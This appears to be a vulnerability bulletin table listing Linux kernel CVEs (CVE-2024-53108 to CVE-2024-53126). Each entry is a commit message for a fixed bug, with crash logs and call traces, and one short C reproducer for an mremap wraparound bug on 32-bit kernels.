In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Adjust VSDB parser for replay feature At some point, the IEEE ID identification for the replay check in the AMD EDID was added. However, this check causes the following out-of-bounds issues when using KASAN: [ 27.804016] BUG: KASAN: slab-out-of-bounds in amdgpu_dm_update_freesync_caps+0xefa/0x17a0 [amdgpu] [ 27.804788] Read of size 1 at addr ffff8881647fdb00 by task systemd-udevd/383 ... [ 27.821207] Memory state around the buggy address: [ 27.821215] ffff8881647fda00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 27.821224] ffff8881647fda80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 27.821234] >ffff8881647fdb00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 27.821243] ^ [ 27.821250] ffff8881647fdb80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 27.821259] ffff8881647fdc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 27.821268] ================================================================== This is caused because the ID extraction happens outside of the range of the edid lenght. This commit addresses this issue by considering the amd_vsdb_block size. (cherry picked from commit b7e381b1ccd5e778e3d9c44c669ad38439a861d8) | 2024-12-02 | not yet calculated | CVE-2024-53108 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nommu: pass NULL argument to vma_iter_prealloc() When deleting a vma entry from a maple tree, it has to pass NULL to vma_iter_prealloc() in order to calculate internal state of the tree, but it passed a wrong argument. As a result, nommu kernels crashed upon accessing a vma iterator, such as acct_collect() reading the size of vma entries after do_munmap(). This commit fixes this issue by passing a right argument to the preallocation call. | 2024-12-02 | not yet calculated | CVE-2024-53109 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: vp_vdpa: fix id_table array not null terminated error Allocate one extra virtio_device_id as null terminator, otherwise vdpa_mgmtdev_get_classes() may iterate multiple times and visit undefined memory. | 2024-12-02 | not yet calculated | CVE-2024-53110 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm/mremap: fix address wraparound in move_page_tables() On 32-bit platforms, it is possible for the expression `len + old_addr < old_end` to be false-positive if `len + old_addr` wraps around. `old_addr` is the cursor in the old range up to which page table entries have been moved; so if the operation succeeded, `old_addr` is the *end* of the old region, and adding `len` to it can wrap. The overflow causes mremap() to mistakenly believe that PTEs have been copied; the consequence is that mremap() bails out, but doesn't move the PTEs back before the new VMA is unmapped, causing anonymous pages in the region to be lost. So basically if userspace tries to mremap() a private-anon region and hits this bug, mremap() will return an error and the private-anon region's contents appear to have been zeroed. The idea of this check is that `old_end - len` is the original start address, and writing the check that way also makes it easier to read; so fix the check by rearranging the comparison accordingly. (An alternate fix would be to refactor this function by introducing an "orig_old_start" variable or such.) Tested in a VM with a 32-bit X86 kernel; without the patch: ``` user@horn:~/big_mremap$ cat test.c #define _GNU_SOURCE #include <stdlib.h> #include <stdio.h> #include <err.h> #include <sys/mman.h> #define ADDR1 ((void*)0x60000000) #define ADDR2 ((void*)0x10000000) #define SIZE 0x50000000uL int main(void) { unsigned char *p1 = mmap(ADDR1, SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0); if (p1 == MAP_FAILED) err(1, "mmap 1"); unsigned char *p2 = mmap(ADDR2, SIZE, PROT_NONE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0); if (p2 == MAP_FAILED) err(1, "mmap 2"); *p1 = 0x41; printf("first char is 0x%02hhx\n", *p1); unsigned char *p3 = mremap(p1, SIZE, SIZE, MREMAP_MAYMOVE|MREMAP_FIXED, p2); if (p3 == MAP_FAILED) { printf("mremap() failed; first char is 0x%02hhx\n", *p1); } else { printf("mremap() succeeded; first char is 0x%02hhx\n", *p3); } } user@horn:~/big_mremap$ gcc -static -o test test.c user@horn:~/big_mremap$ setarch -R ./test first char is 0x41 mremap() failed; first char is 0x00 ``` With the patch: ``` user@horn:~/big_mremap$ setarch -R ./test first char is 0x41 mremap() succeeded; first char is 0x41 ``` | 2024-12-02 | not yet calculated | CVE-2024-53111 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ocfs2: uncache inode which has failed entering the group Syzbot has reported the following BUG: kernel BUG at fs/ocfs2/uptodate.c:509! ... Call Trace: <TASK> ? __die_body+0x5f/0xb0 ? die+0x9e/0xc0 ? do_trap+0x15a/0x3a0 ? ocfs2_set_new_buffer_uptodate+0x145/0x160 ? do_error_trap+0x1dc/0x2c0 ? ocfs2_set_new_buffer_uptodate+0x145/0x160 ? __pfx_do_error_trap+0x10/0x10 ? handle_invalid_op+0x34/0x40 ? ocfs2_set_new_buffer_uptodate+0x145/0x160 ? exc_invalid_op+0x38/0x50 ? asm_exc_invalid_op+0x1a/0x20 ? ocfs2_set_new_buffer_uptodate+0x2e/0x160 ? ocfs2_set_new_buffer_uptodate+0x144/0x160 ? ocfs2_set_new_buffer_uptodate+0x145/0x160 ocfs2_group_add+0x39f/0x15a0 ? __pfx_ocfs2_group_add+0x10/0x10 ? __pfx_lock_acquire+0x10/0x10 ? mnt_get_write_access+0x68/0x2b0 ? __pfx_lock_release+0x10/0x10 ? rcu_read_lock_any_held+0xb7/0x160 ? __pfx_rcu_read_lock_any_held+0x10/0x10 ? smack_log+0x123/0x540 ? mnt_get_write_access+0x68/0x2b0 ? mnt_get_write_access+0x68/0x2b0 ? mnt_get_write_access+0x226/0x2b0 ocfs2_ioctl+0x65e/0x7d0 ? __pfx_ocfs2_ioctl+0x10/0x10 ? smack_file_ioctl+0x29e/0x3a0 ? __pfx_smack_file_ioctl+0x10/0x10 ? lockdep_hardirqs_on_prepare+0x43d/0x780 ? __pfx_lockdep_hardirqs_on_prepare+0x10/0x10 ? __pfx_ocfs2_ioctl+0x10/0x10 __se_sys_ioctl+0xfb/0x170 do_syscall_64+0xf3/0x230 entry_SYSCALL_64_after_hwframe+0x77/0x7f ... </TASK> When 'ioctl(OCFS2_IOC_GROUP_ADD, ...)' has failed for the particular inode in 'ocfs2_verify_group_and_input()', corresponding buffer head remains cached and subsequent call to the same 'ioctl()' for the same inode issues the BUG() in 'ocfs2_set_new_buffer_uptodate()' (trying to cache the same buffer head of that inode). Fix this by uncaching the buffer head with 'ocfs2_remove_from_cache()' on error path in 'ocfs2_group_add()'. | 2024-12-02 | not yet calculated | CVE-2024-53112 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: fix NULL pointer dereference in alloc_pages_bulk_noprof We triggered a NULL pointer dereference for ac.preferred_zoneref->zone in alloc_pages_bulk_noprof() when the task is migrated between cpusets. When cpuset is enabled, in prepare_alloc_pages(), ac->nodemask may be ¤t->mems_allowed. when first_zones_zonelist() is called to find preferred_zoneref, the ac->nodemask may be modified concurrently if the task is migrated between different cpusets. Assuming we have 2 NUMA Node, when traversing Node1 in ac->zonelist, the nodemask is 2, and when traversing Node2 in ac->zonelist, the nodemask is 1. As a result, the ac->preferred_zoneref points to NULL zone. In alloc_pages_bulk_noprof(), for_each_zone_zonelist_nodemask() finds a allowable zone and calls zonelist_node_idx(ac.preferred_zoneref), leading to NULL pointer dereference. __alloc_pages_noprof() fixes this issue by checking NULL pointer in commit ea57485af8f4 ("mm, page_alloc: fix check for NULL preferred_zone") and commit df76cee6bbeb ("mm, page_alloc: remove redundant checks from alloc fastpath"). To fix it, check NULL pointer for preferred_zoneref->zone. | 2024-12-02 | not yet calculated | CVE-2024-53113 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Clear virtualized VMLOAD/VMSAVE on Zen4 client A number of Zen4 client SoCs advertise the ability to use virtualized VMLOAD/VMSAVE, but using these instructions is reported to be a cause of a random host reboot. These instructions aren't intended to be advertised on Zen4 client so clear the capability. | 2024-12-02 | not yet calculated | CVE-2024-53114 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: avoid null_ptr_deref in vmw_framebuffer_surface_create_handle The 'vmw_user_object_buffer' function may return NULL with incorrect inputs. To avoid possible null pointer dereference, add a check whether the 'bo' is NULL in the vmw_framebuffer_surface_create_handle. | 2024-12-02 | not yet calculated | CVE-2024-53115 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix handling of partial GPU mapping of BOs This commit fixes the bug in the handling of partial mapping of the buffer objects to the GPU, which caused kernel warnings. Panthor didn't correctly handle the case where the partial mapping spanned multiple scatterlists and the mapping offset didn't point to the 1st page of starting scatterlist. The offset variable was not cleared after reaching the starting scatterlist. Following warning messages were seen. WARNING: CPU: 1 PID: 650 at drivers/iommu/io-pgtable-arm.c:659 __arm_lpae_unmap+0x254/0x5a0 <snip> pc : __arm_lpae_unmap+0x254/0x5a0 lr : __arm_lpae_unmap+0x2cc/0x5a0 <snip> Call trace: __arm_lpae_unmap+0x254/0x5a0 __arm_lpae_unmap+0x108/0x5a0 __arm_lpae_unmap+0x108/0x5a0 __arm_lpae_unmap+0x108/0x5a0 arm_lpae_unmap_pages+0x80/0xa0 panthor_vm_unmap_pages+0xac/0x1c8 [panthor] panthor_gpuva_sm_step_unmap+0x4c/0xc8 [panthor] op_unmap_cb.isra.23.constprop.30+0x54/0x80 __drm_gpuvm_sm_unmap+0x184/0x1c8 drm_gpuvm_sm_unmap+0x40/0x60 panthor_vm_exec_op+0xa8/0x120 [panthor] panthor_vm_bind_exec_sync_op+0xc4/0xe8 [panthor] panthor_ioctl_vm_bind+0x10c/0x170 [panthor] drm_ioctl_kernel+0xbc/0x138 drm_ioctl+0x210/0x4b0 __arm64_sys_ioctl+0xb0/0xf8 invoke_syscall+0x4c/0x110 el0_svc_common.constprop.1+0x98/0xf8 do_el0_svc+0x24/0x38 el0_svc+0x34/0xc8 el0t_64_sync_handler+0xa0/0xc8 el0t_64_sync+0x174/0x178 <snip> panthor : [drm] drm_WARN_ON(unmapped_sz != pgsize * pgcount) WARNING: CPU: 1 PID: 650 at drivers/gpu/drm/panthor/panthor_mmu.c:922 panthor_vm_unmap_pages+0x124/0x1c8 [panthor] <snip> pc : panthor_vm_unmap_pages+0x124/0x1c8 [panthor] lr : panthor_vm_unmap_pages+0x124/0x1c8 [panthor] <snip> panthor : [drm] *ERROR* failed to unmap range ffffa388f000-ffffa3890000 (requested range ffffa388c000-ffffa3890000) | 2024-12-02 | not yet calculated | CVE-2024-53116 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: virtio/vsock: Improve MSG_ZEROCOPY error handling Add a missing kfree_skb() to prevent memory leaks. | 2024-12-02 | not yet calculated | CVE-2024-53117 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: vsock: Fix sk_error_queue memory leak Kernel queues MSG_ZEROCOPY completion notifications on the error queue. Where they remain, until explicitly recv()ed. To prevent memory leaks, clean up the queue when the socket is destroyed. unreferenced object 0xffff8881028beb00 (size 224): comm "vsock_test", pid 1218, jiffies 4294694897 hex dump (first 32 bytes): 90 b0 21 17 81 88 ff ff 90 b0 21 17 81 88 ff ff ..!.......!..... 00 00 00 00 00 00 00 00 00 b0 21 17 81 88 ff ff ..........!..... backtrace (crc 6c7031ca): [<ffffffff81418ef7>] kmem_cache_alloc_node_noprof+0x2f7/0x370 [<ffffffff81d35882>] __alloc_skb+0x132/0x180 [<ffffffff81d2d32b>] sock_omalloc+0x4b/0x80 [<ffffffff81d3a8ae>] msg_zerocopy_realloc+0x9e/0x240 [<ffffffff81fe5cb2>] virtio_transport_send_pkt_info+0x412/0x4c0 [<ffffffff81fe6183>] virtio_transport_stream_enqueue+0x43/0x50 [<ffffffff81fe0813>] vsock_connectible_sendmsg+0x373/0x450 [<ffffffff81d233d5>] ____sys_sendmsg+0x365/0x3a0 [<ffffffff81d246f4>] ___sys_sendmsg+0x84/0xd0 [<ffffffff81d26f47>] __sys_sendmsg+0x47/0x80 [<ffffffff820d3df3>] do_syscall_64+0x93/0x180 [<ffffffff8220012b>] entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2024-12-02 | not yet calculated | CVE-2024-53118 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: virtio/vsock: Fix accept_queue memory leak As the final stages of socket destruction may be delayed, it is possible that virtio_transport_recv_listen() will be called after the accept_queue has been flushed, but before the SOCK_DONE flag has been set. As a result, sockets enqueued after the flush would remain unremoved, leading to a memory leak. vsock_release __vsock_release lock virtio_transport_release virtio_transport_close schedule_delayed_work(close_work) sk_shutdown = SHUTDOWN_MASK (!) flush accept_queue release virtio_transport_recv_pkt vsock_find_bound_socket lock if flag(SOCK_DONE) return virtio_transport_recv_listen child = vsock_create_connected (!) vsock_enqueue_accept(child) release close_work lock virtio_transport_do_close set_flag(SOCK_DONE) virtio_transport_remove_sock vsock_remove_sock vsock_remove_bound release Introduce a sk_shutdown check to disallow vsock_enqueue_accept() during socket destruction. unreferenced object 0xffff888109e3f800 (size 2040): comm "kworker/5:2", pid 371, jiffies 4294940105 hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 28 00 0b 40 00 00 00 00 00 00 00 00 00 00 00 00 (..@............ backtrace (crc 9e5f4e84): [<ffffffff81418ff1>] kmem_cache_alloc_noprof+0x2c1/0x360 [<ffffffff81d27aa0>] sk_prot_alloc+0x30/0x120 [<ffffffff81d2b54c>] sk_alloc+0x2c/0x4b0 [<ffffffff81fe049a>] __vsock_create.constprop.0+0x2a/0x310 [<ffffffff81fe6d6c>] virtio_transport_recv_pkt+0x4dc/0x9a0 [<ffffffff81fe745d>] vsock_loopback_work+0xfd/0x140 [<ffffffff810fc6ac>] process_one_work+0x20c/0x570 [<ffffffff810fce3f>] worker_thread+0x1bf/0x3a0 [<ffffffff811070dd>] kthread+0xdd/0x110 [<ffffffff81044fdd>] ret_from_fork+0x2d/0x50 [<ffffffff8100785a>] ret_from_fork_asm+0x1a/0x30 | 2024-12-02 | not yet calculated | CVE-2024-53119 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: CT: Fix null-ptr-deref in add rule err flow In error flow of mlx5_tc_ct_entry_add_rule(), in case ct_rule_add() callback returns error, zone_rule->attr is used uninitiated. Fix it to use attr which has the needed pointer value. Kernel log: BUG: kernel NULL pointer dereference, address: 0000000000000110 RIP: 0010:mlx5_tc_ct_entry_add_rule+0x2b1/0x2f0 [mlx5_core] … Call Trace: <TASK> ? __die+0x20/0x70 ? page_fault_oops+0x150/0x3e0 ? exc_page_fault+0x74/0x140 ? asm_exc_page_fault+0x22/0x30 ? mlx5_tc_ct_entry_add_rule+0x2b1/0x2f0 [mlx5_core] ? mlx5_tc_ct_entry_add_rule+0x1d5/0x2f0 [mlx5_core] mlx5_tc_ct_block_flow_offload+0xc6a/0xf90 [mlx5_core] ? nf_flow_offload_tuple+0xd8/0x190 [nf_flow_table] nf_flow_offload_tuple+0xd8/0x190 [nf_flow_table] flow_offload_work_handler+0x142/0x320 [nf_flow_table] ? finish_task_switch.isra.0+0x15b/0x2b0 process_one_work+0x16c/0x320 worker_thread+0x28c/0x3a0 ? __pfx_worker_thread+0x10/0x10 kthread+0xb8/0xf0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2d/0x50 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> | 2024-12-02 | not yet calculated | CVE-2024-53120 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/mlx5: fs, lock FTE when checking if active The referenced commits introduced a two-step process for deleting FTEs: - Lock the FTE, delete it from hardware, set the hardware deletion function to NULL and unlock the FTE. - Lock the parent flow group, delete the software copy of the FTE, and remove it from the xarray. However, this approach encounters a race condition if a rule with the same match value is added simultaneously. In this scenario, fs_core may set the hardware deletion function to NULL prematurely, causing a panic during subsequent rule deletions. To prevent this, ensure the active flag of the FTE is checked under a lock, which will prevent the fs_core layer from attaching a new steering rule to an FTE that is in the process of deletion. [ 438.967589] MOSHE: 2496 mlx5_del_flow_rules del_hw_func [ 438.968205] ------------[ cut here ]------------ [ 438.968654] refcount_t: decrement hit 0; leaking memory. [ 438.969249] WARNING: CPU: 0 PID: 8957 at lib/refcount.c:31 refcount_warn_saturate+0xfb/0x110 [ 438.970054] Modules linked in: act_mirred cls_flower act_gact sch_ingress openvswitch nsh mlx5_vdpa vringh vhost_iotlb vdpa mlx5_ib mlx5_core xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter rpcsec_gss_krb5 auth_rpcgss oid_registry overlay rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm ib_uverbs ib_core zram zsmalloc fuse [last unloaded: cls_flower] [ 438.973288] CPU: 0 UID: 0 PID: 8957 Comm: tc Not tainted 6.12.0-rc1+ #8 [ 438.973888] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 438.974874] RIP: 0010:refcount_warn_saturate+0xfb/0x110 [ 438.975363] Code: 40 66 3b 82 c6 05 16 e9 4d 01 01 e8 1f 7c a0 ff 0f 0b c3 cc cc cc cc 48 c7 c7 10 66 3b 82 c6 05 fd e8 4d 01 01 e8 05 7c a0 ff <0f> 0b c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 90 [ 438.976947] RSP: 0018:ffff888124a53610 EFLAGS: 00010286 [ 438.977446] RAX: 0000000000000000 RBX: ffff888119d56de0 RCX: 0000000000000000 [ 438.978090] RDX: ffff88852c828700 RSI: ffff88852c81b3c0 RDI: ffff88852c81b3c0 [ 438.978721] RBP: ffff888120fa0e88 R08: 0000000000000000 R09: ffff888124a534b0 [ 438.979353] R10: 0000000000000001 R11: 0000000000000001 R12: ffff888119d56de0 [ 438.979979] R13: ffff888120fa0ec0 R14: ffff888120fa0ee8 R15: ffff888119d56de0 [ 438.980607] FS: 00007fe6dcc0f800(0000) GS:ffff88852c800000(0000) knlGS:0000000000000000 [ 438.983984] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 438.984544] CR2: 00000000004275e0 CR3: 0000000186982001 CR4: 0000000000372eb0 [ 438.985205] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 438.985842] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 438.986507] Call Trace: [ 438.986799] <TASK> [ 438.987070] ? __warn+0x7d/0x110 [ 438.987426] ? refcount_warn_saturate+0xfb/0x110 [ 438.987877] ? report_bug+0x17d/0x190 [ 438.988261] ? prb_read_valid+0x17/0x20 [ 438.988659] ? handle_bug+0x53/0x90 [ 438.989054] ? exc_invalid_op+0x14/0x70 [ 438.989458] ? asm_exc_invalid_op+0x16/0x20 [ 438.989883] ? refcount_warn_saturate+0xfb/0x110 [ 438.990348] mlx5_del_flow_rules+0x2f7/0x340 [mlx5_core] [ 438.990932] __mlx5_eswitch_del_rule+0x49/0x170 [mlx5_core] [ 438.991519] ? mlx5_lag_is_sriov+0x3c/0x50 [mlx5_core] [ 438.992054] ? xas_load+0x9/0xb0 [ 438.992407] mlx5e_tc_rule_unoffload+0x45/0xe0 [mlx5_core] [ 438.993037] mlx5e_tc_del_fdb_flow+0x2a6/0x2e0 [mlx5_core] [ 438.993623] mlx5e_flow_put+0x29/0x60 [mlx5_core] [ 438.994161] mlx5e_delete_flower+0x261/0x390 [mlx5_core] [ 438.994728] tc_setup_cb_destroy+0xb9/0x190 [ 438.995150] fl_hw_destroy_filter+0x94/0xc0 [cls_flower] [ 438.995650] fl_change+0x11a4/0x13c0 [cls_flower] [ 438.996105] tc_new_tfilter+0x347/0xbc0 [ 438.996503] ? __ ---truncated--- | 2024-12-02 | not yet calculated | CVE-2024-53121 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mptcp: cope racing subflow creation in mptcp_rcv_space_adjust Additional active subflows - i.e. created by the in kernel path manager - are included into the subflow list before starting the 3whs. A racing recvmsg() spooling data received on an already established subflow would unconditionally call tcp_cleanup_rbuf() on all the current subflows, potentially hitting a divide by zero error on the newly created ones. Explicitly check that the subflow is in a suitable state before invoking tcp_cleanup_rbuf(). | 2024-12-02 | not yet calculated | CVE-2024-53122 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mptcp: error out earlier on disconnect Eric reported a division by zero splat in the MPTCP protocol: Oops: divide error: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 1 UID: 0 PID: 6094 Comm: syz-executor317 Not tainted 6.12.0-rc5-syzkaller-00291-g05b92660cdfe #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:__tcp_select_window+0x5b4/0x1310 net/ipv4/tcp_output.c:3163 Code: f6 44 01 e3 89 df e8 9b 75 09 f8 44 39 f3 0f 8d 11 ff ff ff e8 0d 74 09 f8 45 89 f4 e9 04 ff ff ff e8 00 74 09 f8 44 89 f0 99 <f7> 7c 24 14 41 29 d6 45 89 f4 e9 ec fe ff ff e8 e8 73 09 f8 48 89 RSP: 0018:ffffc900041f7930 EFLAGS: 00010293 RAX: 0000000000017e67 RBX: 0000000000017e67 RCX: ffffffff8983314b RDX: 0000000000000000 RSI: ffffffff898331b0 RDI: 0000000000000004 RBP: 00000000005d6000 R08: 0000000000000004 R09: 0000000000017e67 R10: 0000000000003e80 R11: 0000000000000000 R12: 0000000000003e80 R13: ffff888031d9b440 R14: 0000000000017e67 R15: 00000000002eb000 FS: 00007feb5d7f16c0(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007feb5d8adbb8 CR3: 0000000074e4c000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> __tcp_cleanup_rbuf+0x3e7/0x4b0 net/ipv4/tcp.c:1493 mptcp_rcv_space_adjust net/mptcp/protocol.c:2085 [inline] mptcp_recvmsg+0x2156/0x2600 net/mptcp/protocol.c:2289 inet_recvmsg+0x469/0x6a0 net/ipv4/af_inet.c:885 sock_recvmsg_nosec net/socket.c:1051 [inline] sock_recvmsg+0x1b2/0x250 net/socket.c:1073 __sys_recvfrom+0x1a5/0x2e0 net/socket.c:2265 __do_sys_recvfrom net/socket.c:2283 [inline] __se_sys_recvfrom net/socket.c:2279 [inline] __x64_sys_recvfrom+0xe0/0x1c0 net/socket.c:2279 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7feb5d857559 Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 51 18 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007feb5d7f1208 EFLAGS: 00000246 ORIG_RAX: 000000000000002d RAX: ffffffffffffffda RBX: 00007feb5d8e1318 RCX: 00007feb5d857559 RDX: 000000800000000e RSI: 0000000000000000 RDI: 0000000000000003 RBP: 00007feb5d8e1310 R08: 0000000000000000 R09: ffffffff81000000 R10: 0000000000000100 R11: 0000000000000246 R12: 00007feb5d8e131c R13: 00007feb5d8ae074 R14: 000000800000000e R15: 00000000fffffdef and provided a nice reproducer. The root cause is the current bad handling of racing disconnect. After the blamed commit below, sk_wait_data() can return (with error) with the underlying socket disconnected and a zero rcv_mss. Catch the error and return without performing any additional operations on the current socket. | 2024-12-02 | not yet calculated | CVE-2024-53123 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: fix data-races around sk->sk_forward_alloc Syzkaller reported this warning: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 16 at net/ipv4/af_inet.c:156 inet_sock_destruct+0x1c5/0x1e0 Modules linked in: CPU: 0 UID: 0 PID: 16 Comm: ksoftirqd/0 Not tainted 6.12.0-rc5 #26 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 RIP: 0010:inet_sock_destruct+0x1c5/0x1e0 Code: 24 12 4c 89 e2 5b 48 c7 c7 98 ec bb 82 41 5c e9 d1 18 17 ff 4c 89 e6 5b 48 c7 c7 d0 ec bb 82 41 5c e9 bf 18 17 ff 0f 0b eb 83 <0f> 0b eb 97 0f 0b eb 87 0f 0b e9 68 ff ff ff 66 66 2e 0f 1f 84 00 RSP: 0018:ffffc9000008bd90 EFLAGS: 00010206 RAX: 0000000000000300 RBX: ffff88810b172a90 RCX: 0000000000000007 RDX: 0000000000000002 RSI: 0000000000000300 RDI: ffff88810b172a00 RBP: ffff88810b172a00 R08: ffff888104273c00 R09: 0000000000100007 R10: 0000000000020000 R11: 0000000000000006 R12: ffff88810b172a00 R13: 0000000000000004 R14: 0000000000000000 R15: ffff888237c31f78 FS: 0000000000000000(0000) GS:ffff888237c00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffc63fecac8 CR3: 000000000342e000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? __warn+0x88/0x130 ? inet_sock_destruct+0x1c5/0x1e0 ? report_bug+0x18e/0x1a0 ? handle_bug+0x53/0x90 ? exc_invalid_op+0x18/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? inet_sock_destruct+0x1c5/0x1e0 __sk_destruct+0x2a/0x200 rcu_do_batch+0x1aa/0x530 ? rcu_do_batch+0x13b/0x530 rcu_core+0x159/0x2f0 handle_softirqs+0xd3/0x2b0 ? __pfx_smpboot_thread_fn+0x10/0x10 run_ksoftirqd+0x25/0x30 smpboot_thread_fn+0xdd/0x1d0 kthread+0xd3/0x100 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x34/0x50 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> ---[ end trace 0000000000000000 ]--- Its possible that two threads call tcp_v6_do_rcv()/sk_forward_alloc_add() concurrently when sk->sk_state == TCP_LISTEN with sk->sk_lock unlocked, which triggers a data-race around sk->sk_forward_alloc: tcp_v6_rcv tcp_v6_do_rcv skb_clone_and_charge_r sk_rmem_schedule __sk_mem_schedule sk_forward_alloc_add() skb_set_owner_r sk_mem_charge sk_forward_alloc_add() __kfree_skb skb_release_all skb_release_head_state sock_rfree sk_mem_uncharge sk_forward_alloc_add() sk_mem_reclaim // set local var reclaimable __sk_mem_reclaim sk_forward_alloc_add() In this syzkaller testcase, two threads call tcp_v6_do_rcv() with skb->truesize=768, the sk_forward_alloc changes like this: (cpu 1) | (cpu 2) | sk_forward_alloc ... | ... | 0 __sk_mem_schedule() | | +4096 = 4096 | __sk_mem_schedule() | +4096 = 8192 sk_mem_charge() | | -768 = 7424 | sk_mem_charge() | -768 = 6656 ... | ... | sk_mem_uncharge() | | +768 = 7424 reclaimable=7424 | | | sk_mem_uncharge() | +768 = 8192 | reclaimable=8192 | __sk_mem_reclaim() | | -4096 = 4096 | __sk_mem_reclaim() | -8192 = -4096 != 0 The skb_clone_and_charge_r() should not be called in tcp_v6_do_rcv() when sk->sk_state is TCP_LISTEN, it happens later in tcp_v6_syn_recv_sock(). Fix the same issue in dccp_v6_do_rcv(). | 2024-12-02 | not yet calculated | CVE-2024-53124 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: bpf: sync_linked_regs() must preserve subreg_def Range propagation must not affect subreg_def marks, otherwise the following example is rewritten by verifier incorrectly when BPF_F_TEST_RND_HI32 flag is set: 0: call bpf_ktime_get_ns call bpf_ktime_get_ns 1: r0 &= 0x7fffffff after verifier r0 &= 0x7fffffff 2: w1 = w0 rewrites w1 = w0 3: if w0 < 10 goto +0 --------------> r11 = 0x2f5674a6 (r) 4: r1 >>= 32 r11 <<= 32 (r) 5: r0 = r1 r1 |= r11 (r) 6: exit; if w0 < 0xa goto pc+0 r1 >>= 32 r0 = r1 exit (or zero extension of w1 at (2) is missing for architectures that require zero extension for upper register half). The following happens w/o this patch: - r0 is marked as not a subreg at (0); - w1 is marked as subreg at (2); - w1 subreg_def is overridden at (3) by copy_register_state(); - w1 is read at (5) but mark_insn_zext() does not mark (2) for zero extension, because w1 subreg_def is not set; - because of BPF_F_TEST_RND_HI32 flag verifier inserts random value for hi32 bits of (2) (marked (r)); - this random value is read at (5). | 2024-12-04 | not yet calculated | CVE-2024-53125 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: vdpa: solidrun: Fix UB bug with devres In psnet_open_pf_bar() and snet_open_vf_bar() a string later passed to pcim_iomap_regions() is placed on the stack. Neither pcim_iomap_regions() nor the functions it calls copy that string. Should the string later ever be used, this, consequently, causes undefined behavior since the stack frame will by then have disappeared. Fix the bug by allocating the strings on the heap through devm_kasprintf(). | 2024-12-04 | not yet calculated | CVE-2024-53126 |
| Linux--Linux |
